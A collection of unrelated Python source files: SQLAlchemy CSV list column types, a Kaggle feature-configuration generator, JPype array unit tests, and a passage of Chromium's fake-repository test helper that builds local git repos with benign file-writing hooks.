sorts of lists, if this might apply; e.g. ``mylist = mylist +
[value]``.
- Don't use ``+=``, either; that calls ``list.__iadd__()`` and modifies
the existing list, rather than calling
``InstrumentedAttribute.__set__()``.
- So one method is to ignore ``__init__()`` (meaning new instances will
have the list-type field set to ``None``) and then using this sort of
access function:
.. code-block:: python
def add_to_mylist(self, text: str) -> None:
if self.mylist is None:
self.mylist = [text]
else:
# noinspection PyAugmentAssignment
self.mylist = self.mylist + [text] # not "append()", not "+="
""" # noqa
impl = UnicodeText()
@property
def python_type(self):
return list
@staticmethod
def _strlist_to_dbstr(strlist: Optional[List[str]]) -> str:
if not strlist:
return ""
output = StringIO()
wr = csv.writer(output, quoting=csv.QUOTE_ALL, lineterminator="")
wr.writerow(strlist)
return output.getvalue()
@staticmethod
def _dbstr_to_strlist(dbstr: Optional[str]) -> List[str]:
if not dbstr:
return []
try:
return list(csv.reader([dbstr]))[0]
# ... list( generator( list_of_lines ) )[first_line]
except csv.Error:
log.warning("StringListType: Unable to convert database value of "
"{!r} to Python; returning empty list", dbstr)
return []
def process_bind_param(self, value: Optional[List[str]],
dialect: Dialect) -> str:
"""Convert things on the way from Python to the database."""
retval = self._strlist_to_dbstr(value)
return retval
def process_literal_param(self, value: Optional[List[str]],
dialect: Dialect) -> str:
"""Convert things on the way from Python to the database."""
retval = self._strlist_to_dbstr(value)
return retval
# Could also use "process_literal_param = process_bind_param"
# or vice versa, but this adds some clarity via docstrings.
def process_result_value(self, value: Optional[str],
dialect: Dialect) -> List[str]:
"""Convert things on the way from the database to Python."""
retval = self._dbstr_to_strlist(value)
return retval
# =============================================================================
# IntListType
# =============================================================================
class IntListType(TypeDecorator):
"""
Store a list of integers as CSV.
**Note:** see :class:`StringListType` for a general discussion about
SQLAlchemy types where the Python representation is a list; they can seem
slightly unusual.
"""
impl = Text()
@property
def python_type(self):
return list
@staticmethod
def _intlist_to_dbstr(intlist: Optional[List[int]]) -> str:
if not intlist:
return ""
return ",".join(str(x) for x in intlist)
@staticmethod
def _dbstr_to_intlist(dbstr: Optional[str]) -> List[int]:
if not dbstr:
return []
try:
return [int(x) for x in dbstr.split(",")]
except (TypeError, ValueError):
log.warning("IntListType: Unable to convert database value of {!r}"
" to Python; returning empty list", dbstr)
return []
def process_bind_param(self, value: Optional[List[int]],
dialect: Dialect) -> str:
"""Convert things on the way from Python to the database."""
retval = self._intlist_to_dbstr(value)
return retval
def process_literal_param(self, value: Optional[List[int]],
dialect: Dialect) -> str:
"""Convert things on the way from Python to the database."""
retval = self._intlist_to_dbstr(value)
return retval
def process_result_value(self, value: Optional[str],
dialect: Dialect) -> List[int]:
"""Convert things on the way from the database to Python."""
retval = self._dbstr_to_intlist(value)
return retval
|
|
# -*- coding: utf-8 -*-
"""
@author: Chenglong Chen <c.chenglong@gmail.com>
@brief: generate feature conf for the following models (most of which are linear models)
- reg_skl_ridge
- reg_skl_bayesian_ridge
- reg_skl_lasso
- reg_skl_lsvr
- reg_xgb_linear
- reg_keras_dnn (nonlinear models)
@note:
- such features DO NOT INCLUDE "DocId_(search_term|product_title|product_color|product_brand)"
- one can tune the MANDATORY_FEATS and COMMENT_OUT_FEATS to generate different feature subset
"""
import re
import os
from optparse import OptionParser
import config
from utils import time_utils
INCLUDE_FEATS = [
".+"
]
COUNT_FEATS = [
"Freq",
"Len",
"Count",
"Size",
"Position",
]
# COUNT_FEATS = []
NOT_COUNT_FEATS = ["Norm", "Ratio"]
MANDATORY_FEATS = [
# including product_uid according to
# https://www.kaggle.com/c/home-depot-product-search-relevance/forums/t/20288/trends-in-relevances-by-row-ids/115886#post115886
"DocIdEcho_product_uid",
"ProductUidDummy1_product_uid",
"ProductUidDummy2_product_uid",
"IsInGoogleDict",
"GroupRelevance_Size",
"TSNE",
]
COMMENT_OUT_FEATS = [
#-------------- General --------------
"search_term_alt",
"Bigram",
"Trigram",
"UBgram",
"UBTgram",
"Median",
"Std",
".+(Bigram|Trigram)_.+_product_(brand|color)",
#-------------- Basic --------------
"DocLogFreq",
"Digit",
"Unique",
"^DocIdOneHot",
"^DocId",
"DocLen_product_(brand|color)",
"DocLen_product_attribute_1D",
"DocFreq_product_description_1D",
"DocFreq_product_attribute_1D",
"Digit(Count|Ratio)_product_(brand|color)",
"Doc(Entropy|Len)_product_(brand|color)",
"Unique(Count|Ratio)_.+_product_(brand|color)",
#-------------- Distance --------------
"DiceDistance",
# "EditDistance",
"Compression",
#-------------- First and Last Ngram --------------
"FirstIntersectNormPosition",
"FirstIntersectPosition",
"LastIntersectNormPosition",
"LastIntersectPosition",
#-------------- Group --------------
"GroupRelevance_(Mean|Std|Max|Min|Median)",
"Group_\d+",
"GroupDistanceStat",
#-------------- Intersect Count & Position --------------
"IntersectPosition_.+_(Std|Max|Min|Median)",
"IntersectNormPosition_.+_(Std|Max|Min|Median)",
#-------------- Match --------------
"LongestMatchSize",
#-------------- StatCooc --------------
# since product_name is of length 2, it makes no difference for various aggregation as there is only one item
"StatCooc(TF|NormTF|TFIDF|NormTFIDF|BM25)_Bigram_(Std|Max|Min|Median)_search_term_product_name_x_product_title_product_name_1D",
"StatCooc(TF|NormTF|TFIDF|NormTFIDF|BM25)_Bigram_(Std|Max|Min|Median)_product_title_product_name_x_search_term_product_name_1D",
"NormTF",
"NormTFIDF",
#-------------- Vector Space --------------
# as TFIDF_Word_Trigram has the largest corr
"LSA\d+_Word_Unigram",
"LSA\d+_Word_Bigram",
"TFIDF_Word_Unigram",
"TFIDF_Word_Bigram",
# as TFIDF_Char_Fourgram has the largest corr
"LSA\d+_Char_Bigram",
"LSA\d+_Char_Trigram",
"LSA\d+_Char_Fivegram",
"TFIDF_Char_Bigram",
"TFIDF_Char_Trigram",
"TFIDF_Char_Fivegram",
"CharDistribution_Ratio",
#-------------- Word2Vec & Doc2Vec --------------
"_Vector_",
"_Vdiff_",
"Word2Vec_Wikipedia_D50",
"Word2Vec_Wikipedia_D100",
"Word2Vec_Wikipedia_D200",
# "Word2Vec_GoogleNews",
"Word2Vec_GoogleNews_D300_Vector",
# as all the words are used to train the model
"Word2Vec_Homedepot_D100_Importance",
"Word2Vec_Homedepot_D100_N_Similarity_Imp",
#-------------- Turing Test --------------
# d = {
# "df_basic_features.csv": "Basic",
# "df_brand_material_dummies.csv": "BrandMaterialDummy",
# "df_dist_new.csv": "Dist",
# "dld_features.csv": "DLD",
# "df_st_tfidf.csv": "StTFIDF",
# "df_tfidf_intersept_new.csv": "TFIDF",
# "df_thekey_dummies.csv": "TheKeyDummy",
# "df_word2vec_new.csv": "Word2Vec",
# }
# "TuringTest_Basic",
# "TuringTest_BrandMaterialDummy",
# "TuringTest_Dist",
# "TuringTest_DLD",
# "TuringTest_StTFIDF",
# "TuringTest_TFIDF",
# "TuringTest_TheKeyDummy",
# "TuringTest_Word2Vec",
]
def _check_include(fname):
for v in INCLUDE_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return True
return False
def _check_count_feat(fname):
for v in NOT_COUNT_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return False
for v in COUNT_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return True
return False
def _check_lsa_matrix(fname):
pat = re.compile("^LSA")
if len(re.findall(pat, fname)) > 0:
return True
return False
def _check_mandatory(fname):
for v in MANDATORY_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return True
return False
def _check_comment_out(fname):
for v in COMMENT_OUT_FEATS:
pat = re.compile(v)
if len(re.findall(pat, fname)) > 0:
return True
return False
header_pattern = """
# -*- coding: utf-8 -*-
\"\"\"
@author: Chenglong Chen <c.chenglong@gmail.com>
@brief: one feature conf
Generated by
python %s -d %d -o %s
Format:
FEATURE_NAME : (MANDATORY, TRANSFORM)
\"\"\"
import config
from feature_transformer import SimpleTransform, ColumnSelector
LSA_COLUMNS = range(%d)
feature_dict = {
"""
def _create_feature_conf(lsa_columns, outfile):
res = header_pattern%(__file__, int(lsa_columns), outfile, int(lsa_columns))
folders = [config.FEAT_DIR, config.FEAT_DIR+"/All"]
for folder in folders:
try:
for file in sorted(os.listdir(folder)):
if config.FEAT_FILE_SUFFIX in file:
fname = file.split(".")[0]
if _check_include(fname):
line = ""
mandatory = _check_mandatory(fname)
if not mandatory and _check_comment_out(fname):
continue
line += "# "
line += "'%s' : "%fname
if mandatory:
line += "(True, "
else:
line += "(False, "
if _check_lsa_matrix(fname):
if int(lsa_columns) > 0:
line += "ColumnSelector(LSA_COLUMNS)),\n"
else:
continue
elif _check_count_feat(fname):
line += "SimpleTransform(config.COUNT_TRANSFORM)),\n"
else:
line += "SimpleTransform()),\n"
res += line
except:
pass
res += "}\n"
with open(os.path.join(config.FEAT_CONF_DIR, outfile), "w") as f:
f.write(res)
def parse_args(parser):
parser.add_option("-d", "--dim", default=1, type=int, dest="lsa_columns",
help="lsa_columns")
parser.add_option("-o", "--outfile", default="feature_conf_%s.py"%time_utils._timestamp(),
type="string", dest="outfile", help="outfile")
(options, args) = parser.parse_args()
return options, args
def main(options):
_create_feature_conf(lsa_columns=options.lsa_columns, outfile=options.outfile)
if __name__ == "__main__":
parser = OptionParser()
options, args = parse_args(parser)
main(options)
|
|
#*****************************************************************************
# Copyright 2004-2008 Steve Menard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#*****************************************************************************
try:
import unittest2 as unittest
except ImportError:
import unittest
import sys
import jpype
from jpype import JPackage, JArray, JByte, java
from . import common
if sys.version > '3':
unicode = str
def haveNumpy():
try:
import numpy
return True
except ImportError:
return False
class ArrayTestCase(common.JPypeTestCase) :
def setUp(self):
common.JPypeTestCase.setUp(self)
self.VALUES = [12234,1234,234,1324,424,234,234,142,5,251,242,35,235,62,
1235,46,245132,51, 2, 3, 4]
def testReadArray(self) :
t = JPackage("jpype").array.TestArray()
self.assertNotIsInstance(t, JPackage)
self.assertCountEqual(self.VALUES, t.i)
self.assertEqual(t.i[0], self.VALUES[0])
self.assertCountEqual(self.VALUES[1:-2], t.i[1:-2])
def testStangeBehavior(self) :
''' Test for stange crash reported in bug #1089302'''
Test2 = jpype.JPackage('jpype.array').Test2
test = Test2()
test.test(test.getValue())
def testWriteArray(self) :
t = JPackage("jpype").array.TestArray()
self.assertNotIsInstance(t, JPackage)
t.i[0] = 32
self.assertEqual(t.i[0], 32)
t.i[1:3] = (33, 34)
self.assertEqual(t.i[1], 33)
self.assertEqual(t.i[2], 34)
self.assertCountEqual(t.i[:5], (32, 33, 34 ,1324, 424) )
def testObjectArraySimple(self) :
a = JArray(java.lang.String, 1)(2)
a[1] = "Foo"
self.assertEqual("Foo", a[1])
def testByteArraySimple(self) :
a = JArray(JByte)(2)
a[1] = 2
self.assertEqual(a[1], 2)
def testIterateArray(self):
t = JPackage("jpype").array.TestArray()
self.assertFalse(isinstance(t, JPackage))
for i in t.i :
self.assertNotEqual(i, 0)
def testGetSubclass(self) :
t = JPackage("jpype").array.TestArray()
v = t.getSubClassArray()
self.assertTrue(isinstance(v[0], unicode))
def testGetArrayAsObject(self) :
t = JPackage("jpype").array.TestArray()
v = t.getArrayAsObject()
def testCharArrayAsString(self) :
t = JPackage("jpype").array.TestArray()
v = t.charArray
self.assertEqual(str(v), 'avcd')
self.assertEqual(unicode(v), u'avcd')
def testByteArrayAsString(self) :
t = JPackage("jpype").array.TestArray()
v = t.byteArray
self.assertEqual(str(v), 'avcd')
def testByteArrayIntoVector(self):
ba = jpype.JArray(jpype.JByte)(b'123')
v = jpype.java.util.Vector(1)
v.add(ba)
self.assertEqual(len(v), 1)
self.assertNotEqual(v[0], None)
def testJArrayConversionBool(self):
expected = [True, False, False, True]
jarr = jpype.JArray(jpype.JBoolean)(expected)
self.assertCountEqual(expected, jarr[:])
def testJArrayConversionChar(self):
t = JPackage("jpype").array.TestArray()
v = t.charArray
self.assertEqual(v[:], 'avcd')
# FIXME: this returns unicode on windows
self.assertEqual(str(v[:]), 'avcd')
self.assertEqual(unicode(v[:]), u'avcd')
def testJArrayConversionByte(self):
expected = (0,1,2,3)
ByteBuffer = jpype.java.nio.ByteBuffer
bb = ByteBuffer.allocate(4)
buf = bb.array()
for i in range(len(expected)):
buf[i] = expected[i]
self.assertCountEqual(expected[:], buf[:])
def testJArrayConversionShort(self):
# filter out values, which can not be converted to jshort
self.VALUES = [v for v in self.VALUES if v < (2**16/2 - 1)
and v > (2**16/2 * -1)]
jarr = jpype.JArray(jpype.JShort)(self.VALUES)
result = jarr[0 : len(jarr)]
self.assertCountEqual(self.VALUES, result)
result = jarr[2:10]
self.assertCountEqual(self.VALUES[2:10], result)
# TODO: investigate why overflow is being casted on linux, but not on windows
#with self.assertRaises(jpype._):
# jpype.JArray(jpype.JShort)([2**16/2])
def testJArrayConversionInt(self):
jarr = jpype.JArray(jpype.JInt)(self.VALUES)
result = jarr[0 : len(jarr)]
self.assertCountEqual(self.VALUES, result)
result = jarr[2:10]
self.assertCountEqual(self.VALUES[2:10], result)
def testJArrayConversionLong(self):
jarr = jpype.JArray(jpype.JLong)(self.VALUES)
result = jarr[0 : len(jarr)]
self.assertCountEqual(self.VALUES, result)
result = jarr[2:10]
self.assertCountEqual(self.VALUES[2:10], result)
def testJArrayConversionFloat(self):
VALUES = [float(x) for x in self.VALUES]
jarr = jpype.JArray(jpype.JFloat)(VALUES)
result = jarr[0 : len(jarr)]
self.assertCountEqual(jarr, result)
result = jarr[2:10]
self.assertCountEqual(VALUES[2:10], result)
def testJArrayConversionDouble(self):
VALUES = [float(x) for x in self.VALUES]
jarr = jpype.JArray(jpype.JDouble)(VALUES)
self.assertCountEqual(VALUES, jarr)
result = jarr[:]
self.assertCountEqual(VALUES, result)
result = jarr[2:10]
self.assertEqual(len(VALUES[2:10]), len(result))
self.assertCountEqual(VALUES[2:10], result)
# empty slice
result = jarr[-1:3]
expected = VALUES[-1:3]
self.assertCountEqual(expected, result)
result = jarr[3:-2]
expected = VALUES[3:-2]
self.assertCountEqual(expected, result)
def testConversionError(self):
jarr = jpype.JArray(jpype.JInt, 1)(10)
with self.assertRaises(RuntimeError):
jarr[1:2] = [dict()]
# -1 is returned by python, if conversion fails also, ensure this works
jarr[1:2] = [-1]
def testObjectArrayInitial(self):
l1 = java.util.ArrayList()
l1.add(0)
l2 = java.util.ArrayList()
l2.add(42)
l3 = java.util.ArrayList()
l3.add(13)
jarr = jpype.JArray(java.util.ArrayList, 1)([l1, l2, l3])
self.assertEqual(l1, jarr[0])
self.assertEqual(l2, jarr[1])
self.assertEqual(l3, jarr[2])
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPBoolArray(self):
import numpy as np
n = 100
a = np.random.randint(0, 1, size=n).astype(np.bool)
jarr = jpype.JArray(jpype.JBoolean)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPByteArray(self):
import numpy as np
n = 100
a = np.random.randint(-128, 127, size=n).astype(np.byte)
jarr = jpype.JArray(jpype.JByte)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPShortArray(self):
import numpy as np
n = 100
a = np.random.randint(-32768, 32767, size=n).astype(np.short)
jarr = jpype.JArray(jpype.JShort)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPIntArray(self):
import numpy as np
n = 100
a = np.random.randint(-2**31 - 1, 2**31 - 1, size=n).astype(np.int32)
jarr = jpype.JArray(jpype.JInt)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPLongArray(self):
import numpy as np
n = 100
# actuall the lower bound should be -2**63 -1, but raises Overflow error in numpy
a = np.random.randint(-2**63, 2**63 - 1, size=n).astype(np.int64)
jarr = jpype.JArray(jpype.JLong)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPFloatArray(self):
import numpy as np
n = 100
a = np.random.random(n).astype(np.float32)
jarr = jpype.JArray(jpype.JFloat)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
@unittest.skipUnless(haveNumpy(), "numpy not available")
def testSetFromNPDoubleArray(self):
import numpy as np
n = 100
a = np.random.random(n).astype(np.float64)
jarr = jpype.JArray(jpype.JDouble)(n)
jarr[:] = a
self.assertCountEqual(a, jarr)
|
|
#!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generate fake repositories for testing."""
import atexit
import datetime
import errno
import logging
import os
import pprint
import re
import socket
import sys
import tempfile
import textwrap
import time
# trial_dir must be first for non-system libraries.
from testing_support import trial_dir
import gclient_utils
import scm
import subprocess2
def write(path, content):
f = open(path, 'wb')
f.write(content)
f.close()
join = os.path.join
def read_tree(tree_root):
"""Returns a dict of all the files in a tree. Defaults to self.root_dir."""
tree = {}
for root, dirs, files in os.walk(tree_root):
for d in filter(lambda x: x.startswith('.'), dirs):
dirs.remove(d)
for f in [join(root, f) for f in files if not f.startswith('.')]:
filepath = f[len(tree_root) + 1:].replace(os.sep, '/')
assert len(filepath), f
tree[filepath] = open(join(root, f), 'rU').read()
return tree
def dict_diff(dict1, dict2):
diff = {}
for k, v in dict1.iteritems():
if k not in dict2:
diff[k] = v
elif v != dict2[k]:
diff[k] = (v, dict2[k])
for k, v in dict2.iteritems():
if k not in dict1:
diff[k] = v
return diff
def commit_git(repo):
"""Commits the changes and returns the new hash."""
subprocess2.check_call(['git', 'add', '-A', '-f'], cwd=repo)
subprocess2.check_call(['git', 'commit', '-q', '--message', 'foo'], cwd=repo)
rev = subprocess2.check_output(
['git', 'show-ref', '--head', 'HEAD'], cwd=repo).split(' ', 1)[0]
logging.debug('At revision %s' % rev)
return rev
def test_port(host, port):
s = socket.socket()
try:
return s.connect_ex((host, port)) == 0
finally:
s.close()
def find_free_port(host, base_port):
"""Finds a listening port free to listen to."""
while base_port < (2<<16):
if not test_port(host, base_port):
return base_port
base_port += 1
assert False, 'Having issues finding an available port'
def wait_for_port_to_bind(host, port, process):
sock = socket.socket()
if sys.platform == 'darwin':
# On Mac SnowLeopard, if we attempt to connect to the socket
# immediately, it fails with EINVAL and never gets a chance to
# connect (putting us into a hard spin and then failing).
# Linux doesn't need this.
time.sleep(0.2)
try:
start = datetime.datetime.utcnow()
maxdelay = datetime.timedelta(seconds=30)
while (datetime.datetime.utcnow() - start) < maxdelay:
try:
sock.connect((host, port))
logging.debug('%d is now bound' % port)
return
except (socket.error, EnvironmentError):
pass
logging.debug('%d is still not bound' % port)
finally:
sock.close()
# The process failed to bind. Kill it and dump its ouput.
process.kill()
logging.error('%s' % process.communicate()[0])
assert False, '%d is still not bound' % port
def wait_for_port_to_free(host, port):
start = datetime.datetime.utcnow()
maxdelay = datetime.timedelta(seconds=30)
while (datetime.datetime.utcnow() - start) < maxdelay:
try:
sock = socket.socket()
sock.connect((host, port))
logging.debug('%d was bound, waiting to free' % port)
except (socket.error, EnvironmentError):
logging.debug('%d now free' % port)
return
finally:
sock.close()
assert False, '%d is still bound' % port
class FakeReposBase(object):
"""Generate git repositories to test gclient functionality.
Many DEPS functionalities need to be tested: Var, deps_os, hooks,
use_relative_paths.
And types of dependencies: Relative urls, Full urls, git.
populateGit() needs to be implemented by the subclass.
"""
# Hostname
NB_GIT_REPOS = 1
USERS = [
('user1@example.com', 'foo'),
('user2@example.com', 'bar'),
]
def __init__(self, host=None):
self.trial = trial_dir.TrialDir('repos')
self.host = host or '127.0.0.1'
# Format is { repo: [ None, (hash, tree), (hash, tree), ... ], ... }
# so reference looks like self.git_hashes[repo][rev][0] for hash and
# self.git_hashes[repo][rev][1] for it's tree snapshot.
# It is 1-based too.
self.git_hashes = {}
self.gitdaemon = None
self.git_pid_file = None
self.git_root = None
self.git_dirty = False
self.git_port = None
self.git_base = None
@property
def root_dir(self):
return self.trial.root_dir
def set_up(self):
"""All late initialization comes here."""
self.cleanup_dirt()
if not self.root_dir:
try:
# self.root_dir is not set before this call.
self.trial.set_up()
self.git_root = join(self.root_dir, 'git')
finally:
# Registers cleanup.
atexit.register(self.tear_down)
def cleanup_dirt(self):
"""For each dirty repository, destroy it."""
if self.git_dirty:
if not self.tear_down_git():
logging.error('Using both leaking checkout and git dirty checkout')
def tear_down(self):
"""Kills the servers and delete the directories."""
self.tear_down_git()
# This deletes the directories.
self.trial.tear_down()
self.trial = None
def tear_down_git(self):
if self.gitdaemon:
logging.debug('Killing git-daemon pid %s' % self.gitdaemon.pid)
self.gitdaemon.kill()
self.gitdaemon = None
if self.git_pid_file:
pid = int(self.git_pid_file.read())
self.git_pid_file.close()
logging.debug('Killing git daemon pid %s' % pid)
try:
subprocess2.kill_pid(pid)
except OSError as e:
if e.errno != errno.ESRCH: # no such process
raise
self.git_pid_file = None
wait_for_port_to_free(self.host, self.git_port)
self.git_port = None
self.git_base = None
if not self.trial.SHOULD_LEAK:
logging.debug('Removing %s' % self.git_root)
gclient_utils.rmtree(self.git_root)
else:
return False
return True
@staticmethod
def _genTree(root, tree_dict):
"""For a dictionary of file contents, generate a filesystem."""
if not os.path.isdir(root):
os.makedirs(root)
for (k, v) in tree_dict.iteritems():
k_os = k.replace('/', os.sep)
k_arr = k_os.split(os.sep)
if len(k_arr) > 1:
p = os.sep.join([root] + k_arr[:-1])
if not os.path.isdir(p):
os.makedirs(p)
if v is None:
os.remove(join(root, k))
else:
write(join(root, k), v)
def set_up_git(self):
"""Creates git repositories and start the servers."""
self.set_up()
if self.gitdaemon:
return True
assert self.git_pid_file == None
try:
subprocess2.check_output(['git', '--version'])
except (OSError, subprocess2.CalledProcessError):
return False
for repo in ['repo_%d' % r for r in range(1, self.NB_GIT_REPOS + 1)]:
subprocess2.check_call(['git', 'init', '-q', join(self.git_root, repo)])
self.git_hashes[repo] = [None]
self.git_port = find_free_port(self.host, 20000)
self.git_base = 'git://%s:%d/git/' % (self.host, self.git_port)
# Start the daemon.
self.git_pid_file = tempfile.NamedTemporaryFile()
cmd = ['git', 'daemon',
'--export-all',
'--reuseaddr',
'--base-path=' + self.root_dir,
'--pid-file=' + self.git_pid_file.name,
'--port=%d' % self.git_port]
if self.host == '127.0.0.1':
cmd.append('--listen=' + self.host)
self.check_port_is_free(self.git_port)
self.gitdaemon = subprocess2.Popen(
cmd,
cwd=self.root_dir,
stdout=subprocess2.PIPE,
stderr=subprocess2.PIPE)
wait_for_port_to_bind(self.host, self.git_port, self.gitdaemon)
self.populateGit()
self.git_dirty = False
return True
def _git_rev_parse(self, path):
return subprocess2.check_output(
['git', 'rev-parse', 'HEAD'], cwd=path).strip()
def _commit_git(self, repo, tree):
repo_root = join(self.git_root, repo)
self._genTree(repo_root, tree)
commit_hash = commit_git(repo_root)
if self.git_hashes[repo][-1]:
new_tree = self.git_hashes[repo][-1][1].copy()
new_tree.update(tree)
else:
new_tree = tree.copy()
self.git_hashes[repo].append((commit_hash, new_tree))
def _fast_import_git(self, repo, data):
repo_root = join(self.git_root, repo)
logging.debug('%s: fast-import %s', repo, data)
subprocess2.check_call(
['git', 'fast-import', '--quiet'], cwd=repo_root, stdin=data)
def check_port_is_free(self, port):
sock = socket.socket()
try:
sock.connect((self.host, port))
# It worked, throw.
assert False, '%d shouldn\'t be bound' % port
except (socket.error, EnvironmentError):
pass
finally:
sock.close()
def populateGit(self):
raise NotImplementedError()
class FakeRepos(FakeReposBase):
"""Implements populateGit()."""
NB_GIT_REPOS = 14
def populateGit(self):
# Testing:
# - dependency disappear
# - dependency renamed
# - versioned and unversioned reference
# - relative and full reference
# - deps_os
# - var
# - hooks
# TODO(maruel):
# - use_relative_paths
self._commit_git('repo_3', {
'origin': 'git/repo_3@1\n',
})
self._commit_git('repo_3', {
'origin': 'git/repo_3@2\n',
})
self._commit_git('repo_1', {
'DEPS': """
vars = {
'DummyVariable': 'repo',
'false_var': False,
'false_str_var': 'False',
'true_var': True,
'true_str_var': 'True',
'str_var': 'abc',
'cond_var': 'false_str_var and true_var',
}
# Nest the args file in a sub-repo, to make sure we don't try to
# write it before we've cloned everything.
gclient_gn_args_file = 'src/repo2/gclient.args'
gclient_gn_args = [
'false_var',
'false_str_var',
'true_var',
'true_str_var',
'str_var',
'cond_var',
]
deps = {
'src/repo2': {
'url': '%(git_base)srepo_2',
'condition': 'True',
},
'src/repo2/repo3': '/' + Var('DummyVariable') + '_3@%(hash3)s',
# Test that deps where condition evaluates to False are skipped.
'src/repo5': {
'url': '/repo_5',
'condition': 'False',
},
}
deps_os = {
'mac': {
'src/repo4': '/repo_4',
},
}""" % {
'git_base': self.git_base,
# See self.__init__() for the format. Grab's the hash of the first
# commit in repo_2. Only keep the first 7 character because of:
# TODO(maruel): http://crosbug.com/3591 We need to strip the hash..
# duh.
'hash3': self.git_hashes['repo_3'][1][0][:7]
},
'origin': 'git/repo_1@1\n',
})
self._commit_git('repo_2', {
'origin': 'git/repo_2@1\n',
'DEPS': """
deps = {
'foo/bar': '/repo_3',
}
""",
})
self._commit_git('repo_2', {
'origin': 'git/repo_2@2\n',
})
self._commit_git('repo_4', {
'origin': 'git/repo_4@1\n',
})
self._commit_git('repo_4', {
'origin': 'git/repo_4@2\n',
})
self._commit_git('repo_1', {
'DEPS': """
deps = {
'src/repo2': '%(git_base)srepo_2@%(hash)s',
'src/repo2/repo_renamed': '/repo_3',
}
# I think this is wrong to have the hooks run from the base of the gclient
# checkout. It's maybe a bit too late to change that behavior.
hooks = [
{
'pattern': '.',
'action': ['python', '-c',
'open(\\'src/git_hooked1\\', \\'w\\').write(\\'git_hooked1\\')'],
},
{
# Should not be run.
'pattern': 'nonexistent',
'action': ['python', '-c',
'open(\\'src/git_hooked2\\', \\'w\\').write(\\'git_hooked2\\')'],
},
]
""" % {
'git_base': self.git_base,
# See self.__init__() for the format. Grab's the hash of the first
# commit in repo_2. Only keep the first 7 character because of:
# TODO(maruel): http://crosbug.com/3591 We need to strip the hash.. duh.
'hash': self.git_hashes['repo_2'][1][0][:7]
},
'origin': 'git/repo_1@2\n',
})
self._commit_git('repo_5', {'origin': 'git/repo_5@1\n'})
self._commit_git('repo_5', {
'DEPS': """
deps = {
'src/repo1': '%(git_base)srepo_1@%(hash1)s',
'src/repo2': '%(git_base)srepo_2@%(hash2)s',
}
# Hooks to run after a project is processed but before its dependencies are
# processed.
pre_deps_hooks = [
{
'action': ['python', '-c',
'print "pre-deps hook"; open(\\'src/git_pre_deps_hooked\\', \\'w\\').write(\\'git_pre_deps_hooked\\')'],
}
]
""" % {
'git_base': self.git_base,
'hash1': self.git_hashes['repo_1'][2][0][:7],
'hash2': self.git_hashes['repo_2'][1][0][:7],
},
'origin': 'git/repo_5@2\n',
})
self._commit_git('repo_5', {
'DEPS': """
deps = {
'src/repo1': '%(git_base)srepo_1@%(hash1)s',
'src/repo2': '%(git_base)srepo_2@%(hash2)s',
}
# Hooks to run after a project is processed but before its dependencies are
# processed.
pre_deps_hooks = [
{
'action': ['python', '-c',
'print "pre-deps hook"; open(\\'src/git_pre_deps_hooked\\', \\'w\\').write(\\'git_pre_deps_hooked\\')'],
},
{
'action': ['python', '-c', 'import sys; sys.exit(1)'],
}
]
""" % {
'git_base': self.git_base,
'hash1': self.git_hashes['repo_1'][2][0][:7],
'hash2': self.git_hashes['repo_2'][1][0][:7],
},
'origin': 'git/repo_5@3\n',
})
self._commit_git('repo_6', {
'DEPS': """
vars = {
'DummyVariable': 'repo',
'git_base': '%(git_base)s',
'hook1_contents': 'git_hooked1',
'repo5_var': '/repo_5',
'false_var': False,
'false_str_var': 'False',
'true_var': True,
'true_str_var': 'True',
'str_var': 'abc',
'cond_var': 'false_str_var and true_var',
}
gclient_gn_args_file = 'src/repo2/gclient.args'
gclient_gn_args = [
'false_var',
'false_str_var',
'true_var',
'true_str_var',
'str_var',
'cond_var',
]
allowed_hosts = [
'%(git_base)s',
]
deps = {
'src/repo2': {
'url': Var('git_base') + 'repo_2@%(hash)s',
'condition': 'true_str_var',
},
'src/repo4': {
'url': '/repo_4',
'condition': 'False',
},
'src/repo8': '/repo_8',
}
deps_os ={
'mac': {
# This entry should not appear in flattened DEPS' |deps|.
'src/mac_repo': '{repo5_var}',
},
'unix': {
# This entry should not appear in flattened DEPS' |deps|.
'src/unix_repo': '{repo5_var}',
},
'win': {
# This entry should not appear in flattened DEPS' |deps|.
'src/win_repo': '{repo5_var}',
},
}
hooks = [
{
'pattern': '.',
'condition': 'True',
'action': ['python', '-c',
'open(\\'src/git_hooked1\\', \\'w\\').write(\\'{hook1_contents}\\')'],
},
{
# Should not be run.
'pattern': 'nonexistent',
'action': ['python', '-c',
'open(\\'src/git_hooked2\\', \\'w\\').write(\\'git_hooked2\\')'],
},
]
hooks_os = {
'mac': [
{
'pattern': '.',
'action': ['python', '-c',
'open(\\'src/git_hooked_mac\\', \\'w\\').write('
'\\'git_hooked_mac\\')'],
},
],
}
recursedeps = [
'src/repo2',
'src/repo8',
]""" % {
'git_base': self.git_base,
'hash': self.git_hashes['repo_2'][1][0][:7]
},
'origin': 'git/repo_6@1\n',
})
self._commit_git('repo_7', {
'DEPS': """
vars = {
'true_var': 'True',
'false_var': 'true_var and False',
}
hooks = [
{
'action': ['python', '-c',
